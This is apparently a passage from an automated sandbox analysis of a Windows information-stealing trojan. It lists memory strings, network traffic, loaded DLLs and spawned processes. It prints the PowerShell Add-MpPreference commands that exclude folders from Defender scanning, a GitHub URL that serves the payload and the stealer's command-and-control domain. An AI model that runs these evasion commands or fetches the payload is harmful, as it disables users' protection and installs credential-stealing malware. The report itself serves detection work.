Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.0000000000767000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://hummskitnj.buzz/J
Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286970301.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336828454.0000000003950000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303858804.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262784662.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262559814.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2290478382.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336687721.000000000394F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://hummskitnj.buzz/MN
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238402687.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238058591.000000000394C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262784662.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262559814.000000000394E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238144082.000000000394C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238704688.000000000394F000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.000000000394F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/RX
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/X?
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266197298.0000000000755000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303938546.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266565065.000000000075A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238159093.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/api
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/apiH
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.000000000075A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266197298.0000000000755000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266565065.000000000075A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238159093.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/apiP;
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/apir
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.000000000072F000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.000000000072F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/apir$
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/apis
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361933717.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/apiz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/d
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/l
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361933717.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303938546.0000000000767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/pi
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361933717.0000000000767000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360934017.0000000000767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/uo
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2286935677.0000000000767000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz/z
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz:443/api
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz:443/apil
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361624208.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2360203323.00000000006CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hummskitnj.buzz:443/apin.txtPK
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: OiMp3TH.exe, 00000000.00000002.4461284237.00000000032F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                Source: OiMp3TH.exe, 00000000.00000002.4461284237.00000000032F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/tpuyikkdktyh.exe
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2290373903.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266446094.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2363117071.000000000393E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303858804.000000000393C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239490888.0000000003BE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknown | HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49725 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49733 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49744 version: TLS 1.2

                System Summary

                Source: ghhqoznpon_638708802577261661.exe.0.dr | Static PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.dr | Static PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.dr | Static PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.dr | Static PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.dr | Static PE information: section name:
                Source: C:\Users\user\Desktop\OiMp3TH.exe | Process Stats: CPU usage > 49%
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Code function: 7_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Code function: 7_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Code function: 7_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Code function: 7_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Code function: 7_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Code function: 7_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Code function: 7_3_03957502
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Code function: 7_3_03957502
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Code function: 7_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Code function: 7_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Code function: 7_3_007346D7
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Code function: 7_3_03957502
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Code function: 7_3_03957502
                Source: OiMp3TH.exe, 00000000.00000000.2012588749.0000000000F32000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamepthkkad.exe0 vs OiMp3TH.exe
                Source: OiMp3TH.exe, 00000000.00000002.4460315252.000000000134E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs OiMp3TH.exe
                Source: OiMp3TH.exe | Binary or memory string: OriginalFilenamepthkkad.exe0 vs OiMp3TH.exe
                Source: ghhqoznpon_638708802577261661.exe.0.dr | Static PE information: Section: ZLIB complexity 0.9983207449261993
                Source: ghhqoznpon_638708802577261661.exe.0.dr | Static PE information: Section: .data ZLIB complexity 0.9969605025245634
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/10@3/3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:768:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3144:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ll53ne1s.sxi.ps1
                Source: OiMp3TH.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: OiMp3TH.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\OiMp3TH.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\OiMp3TH.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186701169.00000000038E6000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186831807.00000000038C9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: OiMp3TH.exe | Virustotal: Detection: 25%
                Source: OiMp3TH.exe | ReversingLabs: Detection: 18%
                Source: unknown | Process created: C:\Users\user\Desktop\OiMp3TH.exe "C:\Users\user\Desktop\OiMp3TH.exe"
                Source: C:\Users\user\Desktop\OiMp3TH.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\OiMp3TH.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users'
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\OiMp3TH.exe | Process created: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe "C:\nhrhvnf\ghhqoznpon_638708802577261661.exe"
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: apphelp.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: version.dll
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Section loaded: shfolder.dll
